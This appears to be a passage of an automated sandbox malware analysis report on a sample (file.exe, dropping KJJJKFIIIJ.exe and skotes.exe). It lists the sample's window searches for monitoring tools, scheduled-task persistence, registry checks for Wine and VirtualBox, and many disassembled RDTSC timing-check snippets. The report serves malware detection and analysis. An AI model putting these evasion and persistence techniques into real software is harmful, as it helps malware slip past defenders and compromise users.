Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774389 second address: 7743A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B38 second address: 779B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B3C second address: 779B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B4B second address: 779B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B60 second address: 779B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B66 second address: 779B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779E25 second address: 779E37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A0D6 second address: 77A0E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF0EC6B64CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A0E6 second address: 77A11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a js 00007FF0EC517C7Ch 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC517C84h 0x00000019 jnc 00007FF0EC517C76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A11A second address: 77A11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A11E second address: 77A132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF0EC517C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C98D second address: 77C993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C993 second address: 77C997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA85 second address: 77CA8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CADA second address: 77CAE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAE4 second address: 77CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007FF0EC6B64E0h 0x0000000d push ebx 0x0000000e jmp 00007FF0EC6B64D8h 0x00000013 pop ebx 0x00000014 nop 0x00000015 jmp 00007FF0EC6B64D9h 0x0000001a push 00000000h 0x0000001c push E0E95076h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FF0EC6B64D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB47 second address: 77CB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB4C second address: 77CB51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB51 second address: 77CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 1F16B00Ah 0x0000000e mov edx, dword ptr [ebp+122D1C72h] 0x00000014 push 00000003h 0x00000016 mov cx, 90D0h 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2BDCh], edx 0x00000022 push 00000003h 0x00000024 call 00007FF0EC517C79h 0x00000029 jmp 00007FF0EC517C7Bh 0x0000002e push eax 0x0000002f push eax 0x00000030 push eax 0x00000031 push eax 0x00000032 pop eax 0x00000033 pop eax 0x00000034 pop eax 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push esi 0x0000003a jmp 00007FF0EC517C89h 0x0000003f pop esi 0x00000040 mov eax, dword ptr [eax] 0x00000042 jc 00007FF0EC517C82h 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c jmp 00007FF0EC517C7Eh 0x00000051 pop eax 0x00000052 mov dword ptr [ebp+122D2488h], edx 0x00000058 lea ebx, dword ptr [ebp+12460792h] 0x0000005e pushad 0x0000005f call 00007FF0EC517C7Ch 0x00000064 movsx ecx, bx 0x00000067 pop ebx 0x00000068 popad 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FF0EC517C89h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CC12 second address: 77CC29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDE7 second address: 78DDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDEB second address: 78DE12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC6B64D1h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jc 00007FF0EC6B64C6h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D844 second address: 79D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B7BE second address: 79B7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B93D second address: 79B943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BDB1 second address: 79BDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BDBE second address: 79BDE0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC517C80h 0x00000011 jp 00007FF0EC517C76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C215 second address: 79C21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C21B second address: 79C21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C21F second address: 79C25E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC6B64DEh 0x00000008 jmp 00007FF0EC6B64D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FF0EC6B64D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C25E second address: 79C264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C264 second address: 79C268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C3BE second address: 79C3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF0EC517C7Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C523 second address: 79C541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF0EC6B64CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C807 second address: 79C81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792248 second address: 792269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D5h 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF0EC6B64C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D367 second address: 79D371 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D371 second address: 79D377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D377 second address: 79D381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2FE2 second address: 7A3004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D1h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3004 second address: 7A3014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3014 second address: 7A3023 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64CAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3023 second address: 7A3029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5693 second address: 7A5697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5697 second address: 7A569D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A569D second address: 7A56A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76D960 second address: 76D97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76D97A second address: 76D996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA133 second address: 7AA137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA137 second address: 7AA151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CAh 0x00000007 jno 00007FF0EC6B64C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA151 second address: 7AA155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA155 second address: 7AA159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA159 second address: 7AA169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC517C76h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA169 second address: 7AA173 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA173 second address: 7AA17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA17D second address: 7AA181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA5A7 second address: 7AA5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC74D second address: 7AC753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC753 second address: 7AC757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC8BA second address: 7AC8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC9D6 second address: 7AC9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACAB6 second address: 7ACABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC21 second address: 7ADC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC25 second address: 7ADC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC2F second address: 7ADC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AED97 second address: 7AED9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AE5D4 second address: 7AE5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AED9D second address: 7AEE18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edi, 77530AC2h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FF0EC6B64C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D249Bh], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF0EC6B64C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov esi, dword ptr [ebp+122D3B52h] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 jmp 00007FF0EC6B64CBh 0x0000005e pop edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0336 second address: 7B034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF0EC517C76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
